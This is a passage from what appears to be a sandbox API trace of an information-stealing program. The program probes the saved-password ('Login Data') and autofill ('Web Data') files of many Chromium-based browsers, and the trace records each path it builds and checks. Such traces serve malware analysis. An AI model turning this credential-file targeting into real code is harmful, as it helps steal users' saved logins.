GetProcessHeap () returned 0x620000 [0063.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa4) returned 0x63c450 [0063.140] GetProcessHeap () returned 0x620000 [0063.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.142] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.142] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Login Data") returned 0 [0063.142] GetProcessHeap () returned 0x620000 [0063.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0063.143] GetProcessHeap () returned 0x620000 [0063.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0063.144] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.145] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Web Data") returned 78 [0063.145] GetProcessHeap () returned 0x620000 [0063.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x62ad28 [0063.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.147] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Web Data") returned 0 [0063.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62ad28 | out: hHeap=0x620000) returned 1 [0063.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0063.148] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.149] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Login Data") returned 61 [0063.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7e) returned 0x63c428 [0063.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.150] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Login Data") returned 0 [0063.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0063.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0063.151] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.152] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Default\\Login Data") returned 69 [0063.153] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x63c438 [0063.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.154] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Default\\Login Data") returned 0 [0063.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0063.155] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0063.155] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.156] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Login Data") returned 74 [0063.156] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x98) returned 0x63c450 [0063.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.157] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.157] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Login Data") returned 0 [0063.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0063.158] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0063.159] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.160] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Web Data") returned 72 [0063.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x94) returned 0x63c448 [0063.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.161] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.161] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Web Data") returned 0 [0063.162] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c448 | out: hHeap=0x620000) returned 1 [0063.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0063.163] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.164] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Login Data") returned 55 [0063.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x72) returned 0x6377a0 [0063.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.165] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.165] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Login Data") returned 0 [0063.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6377a0 | out: hHeap=0x620000) returned 1 [0063.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0063.167] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.174] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Default\\Login Data") returned 63 [0063.174] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63c438 [0063.174] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.175] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Default\\Login Data") returned 0 [0063.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0063.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0063.176] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.176] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data") returned 78 [0063.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x62b268 [0063.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.177] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.178] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data") returned 0 [0063.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62b268 | out: hHeap=0x620000) returned 1 [0063.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0063.179] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.180] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Web Data") returned 76 [0063.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9c) returned 0x62ad28 [0063.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.181] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Web Data") returned 0 [0063.181] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62ad28 | out: hHeap=0x620000) returned 1 [0063.181] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0063.182] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.182] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Login Data") returned 59 [0063.182] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7a) returned 0x63c428 [0063.183] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.184] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Login Data") returned 0 [0063.184] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0063.184] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0063.185] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.186] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Default\\Login Data") returned 67 [0063.186] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a) returned 0x63c438 [0063.186] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.187] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Default\\Login Data") returned 0 [0063.187] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0063.187] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0063.188] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.188] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Login Data") returned 80 [0063.188] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa4) returned 0x63c450 [0063.189] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.189] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Login Data") returned 0 [0063.190] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0063.190] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0063.190] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.191] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Web Data") returned 78 [0063.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x62a740 [0063.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.192] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.192] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Web Data") returned 0 [0063.193] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62a740 | out: hHeap=0x620000) returned 1 [0063.193] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0063.194] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.195] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Login Data") returned 61 [0063.195] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7e) returned 0x63c428 [0063.195] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.196] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.197] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Login Data") returned 0 [0063.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0063.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0063.198] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.200] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Default\\Login Data") returned 69 [0063.200] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x63c438 [0063.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.202] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.202] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Default\\Login Data") returned 0 [0063.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0063.202] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0063.203] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.204] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Login Data") returned 83 [0063.204] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xaa) returned 0x63c450 [0063.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.205] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.206] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Login Data") returned 0 [0063.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0063.206] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0063.207] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.208] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Web Data") returned 81 [0063.208] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x63c448 [0063.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.210] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.210] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Web Data") returned 0 [0063.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c448 | out: hHeap=0x620000) returned 1 [0063.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0063.212] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.213] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Login Data") returned 64 [0063.213] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x84) returned 0x63c428 [0063.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.215] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Login Data") returned 0 [0063.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0063.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0063.220] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.221] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Default\\Login Data") returned 72 [0063.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x94) returned 0x63c438 [0063.222] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.222] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Default\\Login Data") returned 0 [0063.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0063.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0063.224] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.224] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data") returned 85 [0063.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63c450 [0063.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.226] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data") returned 0 [0063.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0063.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0063.227] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.227] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Web Data") returned 83 [0063.227] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xaa) returned 0x63c448 [0063.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.229] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Web Data") returned 0 [0063.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c448 | out: hHeap=0x620000) returned 1 [0063.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0063.230] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.230] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Login Data") returned 66 [0063.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x88) returned 0x63c428 [0063.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.232] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Login Data") returned 0 [0063.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0063.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0063.233] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.234] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Default\\Login Data") returned 74 [0063.234] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x98) returned 0x63c438 [0063.234] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.236] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.236] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Default\\Login Data") returned 0 [0063.236] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0063.236] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0063.237] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.237] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Login Data") returned 82 [0063.238] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x63c450 [0063.238] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.239] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.239] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Login Data") returned 0 [0063.239] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0063.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0063.240] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.240] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Web Data") returned 80 [0063.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa4) returned 0x63c448 [0063.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.242] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Web Data") returned 0 [0063.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c448 | out: hHeap=0x620000) returned 1 [0063.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f5e) returned 0x6384c0 [0063.243] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.244] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Login Data") returned 63 [0063.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x63c428 [0063.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.246] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Login Data") returned 0 [0063.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c428 | out: hHeap=0x620000) returned 1 [0063.246] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f6e) returned 0x6384c0 [0063.247] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.248] wvsprintfW (in: param_1=0x6384c0, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Default\\Login Data") returned 71 [0063.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x92) returned 0x63c438 [0063.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.250] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.250] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Default\\Login Data") returned 0 [0063.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c438 | out: hHeap=0x620000) returned 1 [0063.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f84) returned 0x6384c0 [0063.251] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.252] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data") returned 72 [0063.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x94) returned 0x63c450 [0063.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6384c0 | out: hHeap=0x620000) returned 1 [0063.253] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0063.253] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data") returned 0 [0063.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63c450 | out: hHeap=0x620000) returned 1 [0063.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f80) returned 0x6384c0 [0063.254] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0063.254] wvsprintfW (in: param_1=0x6384c0, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Web Data") returned 70 [0063.254] RtlAllocateHeap 